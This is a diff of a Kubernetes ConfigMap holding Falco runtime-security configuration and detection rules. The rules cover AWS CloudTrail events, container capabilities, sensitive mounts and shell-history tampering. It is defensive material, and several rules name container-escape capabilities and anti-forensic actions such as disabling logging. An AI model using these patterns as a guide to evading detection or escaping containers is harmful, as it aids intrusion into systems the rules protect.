monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. 
Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
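The `outputs: rate / max_burst` section in the rendered falco.yaml above describes a token bucket: an initial burst of up to 1000 notifications, then roughly one per second. A compact sketch of that throttle, with fabricated timestamps (this mirrors the documented behavior, not Falco's internal code):

```python
# Token-bucket throttle as described by falco.yaml's `outputs` section
# (rate=1 token/s, max_burst=1000). Timestamps are fabricated.
class TokenBucket:
    def __init__(self, rate=1.0, max_burst=1000):
        self.rate, self.max_burst = rate, max_burst
        self.tokens, self.last = float(max_burst), 0.0

    def allow(self, now):
        # Refill proportionally to elapsed time, capped at the burst size.
        self.tokens = min(self.max_burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

tb = TokenBucket()
# 1500 notifications at the same instant: only the burst of 1000 passes.
burst = sum(tb.allow(0.0) for _ in range(1500))
print(burst)  # 1000
```

After the burst drains, waiting one second refills one token, so one further notification is allowed per second of quiet.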
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
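The `json.value[/…]` fields used by these CloudTrail rules take an RFC 6901 JSON Pointer into the raw event record. A minimal resolver against a fabricated login event shows how the MFA conditions above read nested fields (the resolver is illustrative, not the json plugin itself):

```python
def json_pointer(doc, pointer):
    # Resolve an RFC 6901 JSON Pointer like /responseElements/ConsoleLogin.
    node = doc
    for token in pointer.lstrip("/").split("/"):
        token = token.replace("~1", "/").replace("~0", "~")  # unescape
        node = node[int(token)] if isinstance(node, list) else node[token]
    return node

event = {  # fabricated CloudTrail fields referenced by the MFA rules above
    "responseElements": {"ConsoleLogin": "Success"},
    "additionalEventData": {"MFAUsed": "No"},
}
print(json_pointer(event, "/responseElements/ConsoleLogin"))  # Success
print(json_pointer(event, "/additionalEventData/MFAUsed"))    # No
```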
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect when a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect when a new task is run or started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deletion of the encryption configuration for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        An encryption configuration for a bucket has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deletion of the public access block on a bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: CloudTrail logging has been disabled; this could potentially be malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
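
Because `falco_rules.local.yaml` is loaded after the default rules file, a local override only needs to redefine the macro, list, or rule it wants to change. For example, the `Modify Shell Configuration File` rule in the default file exposes a `user_known_shell_config_modifiers` exception macro; a sketch of overriding it from this file follows (the process name `puppet` is a hypothetical example of a trusted tool):

```yaml
# Hypothetical falco_rules.local.yaml entry; "puppet" is an example process name.
- macro: user_known_shell_config_modifiers
  condition: (proc.name = puppet)
```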
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
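
Both the privileged-container and excessively-capable-container rules above exclude `falco_privileged_containers` and `user_privileged_containers`. Deployment-specific exemptions are typically made by overriding the user macro in `falco_rules.local.yaml` rather than editing the shipped image list; a sketch follows, with a hypothetical image name:

```yaml
# Hypothetical local override exempting one trusted image from both rules.
- macro: user_privileged_containers
  condition: (container.image.repository = "registry.example.com/trusted-agent")
```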
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
      desc: Detect creation of files below /dev by processes other than known device-management programs. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
